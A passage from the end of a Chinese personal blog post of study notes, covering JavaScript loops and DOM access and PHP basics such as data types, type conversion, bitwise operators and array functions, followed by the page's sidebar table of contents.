不同时执行的代码</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="十三、for循环"><a href="#十三、for循环" class="headerlink" title="十三、for循环"></a>十三、for循环</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">for( i&#x3D;0;i&lt;cars.length;i++)</span><br><span class="line">&#123;</span><br><span class="line">   var value &#x3D; cars[i];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="十四、for-in遍历"><a href="#十四、for-in遍历" class="headerlink" title="十四、for in遍历"></a>十四、for in遍历</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">var person&#x3D;&#123;fname:&quot;John&quot;,lname:&quot;Doe&quot;,age:25&#125;; </span><br><span class="line"> </span><br><span class="line">for (x in person)  &#x2F;&#x2F; x 为属性名</span><br><span class="line">&#123;</span><br><span class="line">    txt&#x3D;txt + person[x];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="十五、while循环"><a href="#十五、while循环" class="headerlink" title="十五、while循环"></a>十五、while循环</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">while (条件)</span><br><span class="line">&#123;</span><br><span class="line">    需要执行的代码</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="十六、do-while循环"><a href="#十六、do-while循环" class="headerlink" title="十六、do while循环"></a>十六、do while循环</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">do</span><br><span class="line">&#123;</span><br><span class="line">    需要执行的代码</span><br><span class="line">&#125;</span><br><span class="line">while (条件);</span><br></pre></td></tr></table></figure>
<p>和前者相比，区别为：当调节不满足，<code>do while</code>循环也至少会执行一次循环体，<code>while</code>则一次不执行</p>
<h3 id="十七、dom"><a href="#十七、dom" class="headerlink" title="十七、dom"></a>十七、dom</h3><p><code>DOM</code> 是 <code>Document Object Model</code>（<strong>文档对象模型</strong>）的缩写</p>
<h3 id="十八、-访问-HTML-元素（节点）"><a href="#十八、-访问-HTML-元素（节点）" class="headerlink" title="十八、  访问 HTML 元素（节点）"></a>十八、  访问 HTML 元素（节点）</h3><p>通过使用 <code>getElementById()</code> 方法</p>
<p>通过使用 <code>getElementsByTagName()</code> 方法</p>
<h2 id="八、PHP-1"><a href="#八、PHP-1" class="headerlink" title="八、PHP"></a>八、PHP</h2><h3 id="1-删除变量"><a href="#1-删除变量" class="headerlink" title="1.删除变量"></a>1.删除变量</h3><p><code>unset</code></p>
<h3 id="2-常量定义"><a href="#2-常量定义" class="headerlink" title="2.常量定义"></a>2.常量定义</h3><ol>
<li>使用定义常量的函数：define(‘常量名’,常量值);</li>
<li>5.3之后才有的：const 常量名 = 值;</li>
</ol>
<h3 id="3-数据类型"><a href="#3-数据类型" class="headerlink" title="3.数据类型"></a>3.数据类型</h3><ul>
<li><p>简单（基本）数据类型</p>
<ul>
<li><p>整型：int/integer，系统分配4个字节存储，、</p>
</li>
<li><p>浮点型：float/double，系统分配8个字节存储，、</p>
</li>
<li><p>字符串型：string，系统根据实际长度分配，、</p>
</li>
<li><p>布尔类型：bool/boolean，表示布尔类型，只有两个值：true和false</p>
</li>
</ul>
</li>
<li><p>复合数据类型</p>
<ul>
<li><p>对象类型：object，存放对象（面向对象）</p>
</li>
<li><p>数组类型：array，存储多个数据（一次性）</p>
</li>
</ul>
</li>
<li><p>特殊数据类型</p>
<ul>
<li><p>资源类型：resource，存放资源数据（PHP外部数据，如数据库、文件）</p>
</li>
<li><p>空类型：NULL，只有一个值就是NULL（不能运算）</p>
</li>
</ul>
</li>
</ul>
<h3 id="4-类型转换"><a href="#4-类型转换" class="headerlink" title="4.类型转换"></a>4.类型转换</h3><ul>
<li><p>自动转换：系统根据需求自己判定，自己转换。</p>
</li>
<li><p>强制（手动）转换：人为根据需要的目标类型转换<br>强制转换规则：在变量之前增加一个括号()，然后在里面写上对应类型。</p>
</li>
<li><p>字符串转数值有自己的规则</p>
<ol>
<li>以字母开头的字符串，永远为0；</li>
<li>以数字开头的字符串，取到碰到字符串为止（不会同时包含两个小数点）</li>
</ol>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">settype(变量名,类型)：设定数据类型，改变原始数据</span><br></pre></td></tr></table></figure>

<h4 id="5-不同进制整数表示"><a href="#5-不同进制整数表示" class="headerlink" title="5.不同进制整数表示"></a>5.不同进制整数表示</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$a &#x3D; 120;		&#x2F;&#x2F;10进制</span><br><span class="line">$a&#x3D;0b110;	&#x2F;&#x2F;2进制</span><br><span class="line">$a&#x3D;0120;		&#x2F;&#x2F;8进制</span><br><span class="line">$a&#x3D;0x120;	&#x2F;&#x2F;16进制</span><br></pre></td></tr></table></figure>

<p>类型转换函数：</p>
<ul>
<li>decbin()：十进制转二进制</li>
<li>decoct()：十进制转八进制</li>
<li>dechex()：十进制转十六进制</li>
<li>bindec()：二进制转十进制</li>
</ul>
<h4 id="6-empty-和isset"><a href="#6-empty-和isset" class="headerlink" title="6.empty()和isset()"></a>6.empty()和isset()</h4><ul>
<li>empty()：判断数据的值是否为“空”，不是NULL，如果为空返回true，不为空返回false</li>
<li>isset()：判断数据存储的变量本身是否存在，存在变量返回true，不存在返回false</li>
</ul>
<h4 id="7-计算机码及位运算"><a href="#7-计算机码及位运算" class="headerlink" title="7.计算机码及位运算"></a>7.计算机码及位运算</h4><blockquote>
<p>计算机码：原码、反码和补码，数值本身最左边一位是用来充当符号位：正数为0，负数为1</p>
</blockquote>
<ul>
<li>原码：数据本身从十进制转换成二进制得到的结果<ul>
<li>正数：左边符号位为0（正数的原码、反码和补码就是原码本身）</li>
<li>负数：左边符号位为1</li>
</ul>
</li>
<li>反码：针对负数，符号位不变，其他位取反</li>
<li>补码：针对负数，反码+1</li>
</ul>
<p>位运算：取出计算机中最小的单位（位bit）进行运算<br>|符号|意义<br>|–|–|<br>|&amp;|按位与，两个位都为1，结果为1，否则为0<br>|||按位或，两个有一个为1，结果为1<br>|~|按位非，一个位如果为1则变成0，否则反之<br>|^|按位异或，两个相同则为0，不同则为1<br>|&lt;&lt;|按位左移，整个位（32位），向左移动一位，右边补0<br>|&gt;&gt;|按位右移，整个位向右移动一位，左边补符号位对应内容（正数补0，负数补1）</p>
<ul>
<li>注意：<ol>
<li>系统进行任何位运算的时候都是使用的补码</li>
<li>运算结束之后都必须将补码转换成原码才是最终要显示的数据</li>
</ol>
</li>
</ul>
<h3 id="8-流程控制替代语法"><a href="#8-流程控制替代语法" class="headerlink" title="8.流程控制替代语法"></a>8.流程控制替代语法</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">if：if():    endif;</span><br><span class="line">switch：switch():   endswitch;</span><br><span class="line">for:  for:      endfor;</span><br><span class="line">while   while:    endwhile;</span><br><span class="line">foreach   foreach:    endforeach;</span><br></pre></td></tr></table></figure>

<h3 id="9-数组"><a href="#9-数组" class="headerlink" title="9.数组"></a>9.数组</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">sort()：顺序排序（下标重排）</span><br><span class="line">rsort()：逆序排序</span><br><span class="line">asort()：顺序排序（下标保留）</span><br><span class="line">arsort()：逆序排序</span><br><span class="line">ksort()：顺序排序：按照键名（下标）(保留下标)</span><br><span class="line">krsort()：逆序排序</span><br><span class="line">shuffle()：随机打乱数组元素，数组下标会重排</span><br><span class="line">reset()：重置指针，将数组指针回到首位</span><br><span class="line">end()：重置指针，将数组指针指导最后一个元素</span><br><span class="line">next()：指针下移，取得下一个元素的值</span><br><span class="line">prev()：指针上移，取得上一个元素的值</span><br><span class="line">current()：获取当前指针对应的元素值</span><br><span class="line">key()：获取当前指针对应的下标值</span><br><span class="line">count()：统计数组中元素的数量</span><br><span class="line">array_push()：往数组中加入一个元素（数组后面）</span><br><span class="line">array_pop()：从数组中取出一个元素（数组后面）</span><br><span class="line">array_shift()：从数组中取出一个元素（数组前面）</span><br><span class="line">array_unshift()：从数组中加入一个元素（数组前面）</span><br></pre></td></tr></table></figure>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>atsud0
  </li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="http://atsud0.me/2020/04/24/%E7%AC%94%E8%AE%B0/" title="笔记">http://atsud0.me/2020/04/24/笔记/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> unless stating additionally.
  </li>
</ul>
</div>


      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/04/24/netcat-socat%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="prev" title="nc,socat,frp笔记">
      <i class="fa fa-chevron-left"></i> nc,socat,frp笔记
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/04/24/Vulnhub-Lazysysadmin/" rel="next" title="Vulnhub-Lazysysadmin">
      Vulnhub-Lazysysadmin <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#A级别-重要知识点"><span class="nav-number">1.</span> <span class="nav-text">A级别:重要知识点</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#一、虚拟机："><span class="nav-number">1.1.</span> <span class="nav-text">一、虚拟机：</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-三种网络模式："><span class="nav-number">1.1.1.</span> <span class="nav-text">1.三种网络模式：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二、Linux"><span class="nav-number">1.2.</span> <span class="nav-text">二、Linux</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-运行级别：init"><span class="nav-number">1.2.1.</span> <span class="nav-text">1.运行级别：init</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-Linux目录结构"><span class="nav-number">1.2.2.</span> <span class="nav-text">2.Linux目录结构</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-常用命令"><span class="nav-number">1.2.3.</span> <span class="nav-text">3.常用命令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-重要系统文件"><span class="nav-number">1.2.4.</span> <span class="nav-text">4.重要系统文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-vim"><span class="nav-number">1.2.5.</span> <span class="nav-text">5.vim</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#三、网络基础"><span class="nav-number">1.3.</span> <span class="nav-text">三、网络基础</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-IP"><span class="nav-number">1.3.1.</span> <span class="nav-text">1.IP</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-子网掩码"><span class="nav-number">1.3.2.</span> <span class="nav-text">2.子网掩码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-网关"><span class="nav-number">1.3.3.</span> <span class="nav-text">3.网关</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-通信子网和资源子网"><span class="nav-number">1.3.4.</span> <span class="nav-text">4. 通信子网和资源子网</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-OSI参考模型"><span class="nav-number">1.3.5.</span> <span class="nav-text">5.OSI参考模型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-TCP-IP参考模型"><span class="nav-number">1.3.6.</span> <span class="nav-text">6.TCP&#x2F;IP参考模型</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#四、数据库"><span class="nav-number">1.4.</span> <span class="nav-text">四、数据库</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-分类"><span class="nav-number">1.4.1.</span> <span class="nav-text">1.分类</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-特点"><span class="nav-number">1.4.2.</span> <span class="nav-text">2.特点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-数据库连接及退出"><span class="nav-number">1.4.3.</span> <span class="nav-text">3.数据库连接及退出</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-常见数据库命令"><span class="nav-number">1.4.4.</span> <span class="nav-text">4.常见数据库命令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-SQL注入相关重点内容"><span class="nav-number">1.4.5.</span> <span class="nav-text">5.SQL注入相关重点内容</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#五、编程语言类"><span class="nav-number">1.5.</span> <span class="nav-text">五、编程语言类</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#一、单引号和双引号"><span class="nav-number">1.5.1.</span> <span class="nav-text">一、单引号和双引号</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#二、变量名命名规则"><span class="nav-number">1.5.2.</span> <span class="nav-text">二、变量名命名规则</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#三、数组下标"><span class="nav-number">1.5.3.</span> <span class="nav-text">三、数组下标</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#四、break和continue"><span class="nav-number">1.5.4.</span> <span class="nav-text">四、break和continue</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#五、不同等号的含义"><span class="nav-number">1.5.5.</span> <span class="nav-text">五、不同等号的含义</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#六、逻辑运算"><span class="nav-number">1.5.6.</span> <span class="nav-text">六、逻辑运算</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#六、HTML"><span class="nav-number">1.6.</span> <span class="nav-text">六、HTML</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-基本框架"><span class="nav-number">1.6.1.</span> <span class="nav-text">1.基本框架</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-常用标签"><span class="nav-number">1.6.2.</span> <span class="nav-text">2.常用标签</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#七、nc及Linux反弹shell"><span class="nav-number">1.7.</span> <span class="nav-text">七、nc及Linux反弹shell</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#NC远程控制"><span class="nav-number">1.7.1.</span> <span class="nav-text">NC远程控制</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Linux反弹shell"><span class="nav-number">1.7.2.</span> <span class="nav-text">Linux反弹shell</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#八、PHP"><span class="nav-number">1.8.</span> <span class="nav-text">八、PHP</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-注释符"><span class="nav-number">1.8.1.</span> <span class="nav-text">1.注释符</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-语句分隔符"><span class="nav-number">1.8.2.</span> <span class="nav-text">2.语句分隔符</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-变量语法规则"><span class="nav-number">1.8.3.</span> <span class="nav-text">3.变量语法规则</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-变量传值"><span class="nav-number">1.8.4.</span> <span class="nav-text">4.变量传值</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-选择循环结构"><span class="nav-number">1.8.5.</span> <span class="nav-text">5.选择循环结构</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#if"><span class="nav-number">1.8.5.1.</span> <span class="nav-text">if</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#switch"><span class="nav-number">1.8.5.2.</span> <span class="nav-text">switch</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#for"><span class="nav-number">1.8.5.3.</span> <span class="nav-text">for</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#while"><span class="nav-number">1.8.5.4.</span> <span class="nav-text">while</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#do-while"><span class="nav-number">1.8.5.5.</span> <span class="nav-text">do while</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#break和continue进阶使用"><span class="nav-number">1.8.5.6.</span> <span class="nav-text">break和continue进阶使用</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-include和require"><span class="nav-number">1.8.6.</span> <span class="nav-text">6.include和require</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-函数"><span class="nav-number">1.8.7.</span> <span class="nav-text">7.函数</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#形参和实参"><span class="nav-number">1.8.7.1.</span> <span class="nav-text">形参和实参</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#引用传值"><span class="nav-number">1.8.7.2.</span> <span class="nav-text">引用传值</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#返回值"><span class="nav-number">1.8.7.3.</span> <span class="nav-text">返回值</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#return关键字"><span class="nav-number">1.8.7.4.</span> <span class="nav-text">return关键字</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#作用域"><span class="nav-number">1.8.7.5.</span> <span class="nav-text">作用域</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#静态变量"><span class="nav-number">1.8.7.6.</span> <span class="nav-text">静态变量</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#可变函数"><span class="nav-number">1.8.7.7.</span> <span class="nav-text">可变函数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#匿名函数"><span class="nav-number">1.8.7.8.</span> <span class="nav-text">匿名函数</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-数组"><span class="nav-number">1.8.8.</span> <span class="nav-text">8.数组</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#数组特点"><span class="nav-number">1.8.8.1.</span> <span class="nav-text">数组特点</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#foreach遍历数组"><span class="nav-number">1.8.8.2.</span> <span class="nav-text">foreach遍历数组</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#9-表单传值"><span class="nav-number">1.8.9.</span> <span class="nav-text">9.表单传值</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#get方式"><span class="nav-number">1.8.9.1.</span> <span class="nav-text">get方式</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#post方式"><span class="nav-number">1.8.9.2.</span> <span class="nav-text">post方式</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#10-文件上传"><span class="nav-number">1.8.10.</span> <span class="nav-text">10.文件上传</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#上传表单写法"><span class="nav-number">1.8.10.1.</span> <span class="nav-text">上传表单写法</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#FILES"><span class="nav-number">1.8.10.2.</span> <span class="nav-text">$_FILES</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#11-PHP操作数据库"><span class="nav-number">1.8.11.</span> <span class="nav-text">11.PHP操作数据库</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#重要函数"><span class="nav-number">1.8.11.1.</span> <span class="nav-text">重要函数</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#B级别-一般知识点"><span class="nav-number">2.</span> <span class="nav-text">B级别:一般知识点</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#一、网络安全法"><span class="nav-number">2.1.</span> <span class="nav-text">一、网络安全法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二、虚拟机："><span class="nav-number">2.2.</span> <span class="nav-text">二、虚拟机：</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-做快照"><span class="nav-number">2.2.1.</span> <span class="nav-text">1.做快照</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-做克隆"><span class="nav-number">2.2.2.</span> <span class="nav-text">2.做克隆</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#三、Linux"><span class="nav-number">2.3.</span> <span class="nav-text">三、Linux</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-linux发行版概念"><span class="nav-number">2.3.1.</span> <span class="nav-text">1.linux发行版概念</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-kali初始设置"><span class="nav-number">2.3.2.</span> <span class="nav-text">2.kali初始设置</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Kali开启ssh"><span class="nav-number">2.3.3.</span> <span class="nav-text">Kali开启ssh</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#四：数据库"><span class="nav-number">2.4.</span> <span class="nav-text">四：数据库</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#五、SHELL编程"><span class="nav-number">2.5.</span> <span class="nav-text">五、SHELL编程</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#六、CSS层叠样式表"><span class="nav-number">2.6.</span> <span class="nav-text">六、CSS层叠样式表</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#七、JavaScript"><span class="nav-number">2.7.</span> <span class="nav-text">七、JavaScript</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#一、定义语法"><span class="nav-number">2.7.1.</span> <span class="nav-text">一、定义语法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#二、全局变量和局部变量"><span class="nav-number">2.7.2.</span> <span class="nav-text">二、全局变量和局部变量</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#三、变量生命周期"><span class="nav-number">2.7.3.</span> <span class="nav-text">三、变量生命周期</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#四、外部调用JS脚本"><span class="nav-number">2.7.4.</span> <span class="nav-text">四、外部调用JS脚本</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#五、输出方式"><span class="nav-number">2.7.5.</span> <span class="nav-text">五、输出方式</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#弹出警告框"><span class="nav-number">2.7.5.1.</span> <span class="nav-text">弹出警告框</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#六、变量"><span class="nav-number">2.7.6.</span> <span class="nav-text">六、变量</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#七、注释"><span class="nav-number">2.7.7.</span> <span class="nav-text">七、注释</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#八、大小写敏感"><span class="nav-number">2.7.8.</span> <span class="nav-text">八、大小写敏感</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#九、数组"><span class="nav-number">2.7.9.</span> <span class="nav-text">九、数组</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#一、定义方式"><span class="nav-number">2.7.9.1.</span> <span class="nav-text">一、定义方式</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#十、对象"><span class="nav-number">2.7.10.</span> <span class="nav-text">十、对象</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#十一、if选择结构"><span class="nav-number">2.7.11.</span> <span class="nav-text">十一、if选择结构</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#十二、switch选择结构"><span class="nav-number">2.7.12.</span> <span class="nav-text">十二、switch选择结构</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#十三、for循环"><span class="nav-number">2.7.13.</span> <span class="nav-text">十三、for循环</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#十四、for-in遍历"><span class="nav-number">2.7.14.</span> <span class="nav-text">十四、for in遍历</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#十五、while循环"><span class="nav-number">2.7.15.</span> <span class="nav-text">十五、while循环</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#十六、do-while循环"><span class="nav-number">2.7.16.</span> <span class="nav-text">十六、do while循环</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#十七、dom"><span class="nav-number">2.7.17.</span> <span class="nav-text">十七、dom</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#十八、-访问-HTML-元素（节点）"><span class="nav-number">2.7.18.</span> <span class="nav-text">十八、  访问 HTML 元素（节点）</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#八、PHP-1"><span class="nav-number">2.8.</span> <span class="nav-text">八、PHP</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-删除变量"><span class="nav-number">2.8.1.</span> <span class="nav-text">1.删除变量</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-常量定义"><span class="nav-number">2.8.2.</span> <span class="nav-text">2.常量定义</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-数据类型"><span class="nav-number">2.8.3.</span> <span class="nav-text">3.数据类型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-类型转换"><span class="nav-number">2.8.4.</span> <span class="nav-text">4.类型转换</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#5-不同进制整数表示"><span class="nav-number">2.8.4.1.</span> <span class="nav-text">5.不同进制整数表示</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#6-empty-和isset"><span class="nav-number">2.8.4.2.</span> <span class="nav-text">6.empty()和isset()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#7-计算机码及位运算"><span class="nav-number">2.8.4.3.</span> <span class="nav-text">7.计算机码及位运算</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-流程控制替代语法"><span class="nav-number">2.8.5.</span> <span class="nav-text">8.流程控制替代语法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#9-数组"><span class="nav-number">2.8.6.</span> <span class="nav-text">9.数组</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="atsud0"
      src="https://images.atsud0.me/images/atsud0-avator.jpg">
  <p class="site-author-name" itemprop="name">atsud0</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">136</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/index.html">
          
        <span class="site-state-item-count">174</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/atsud0" title="GitHub → https://github.com/atsud0" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
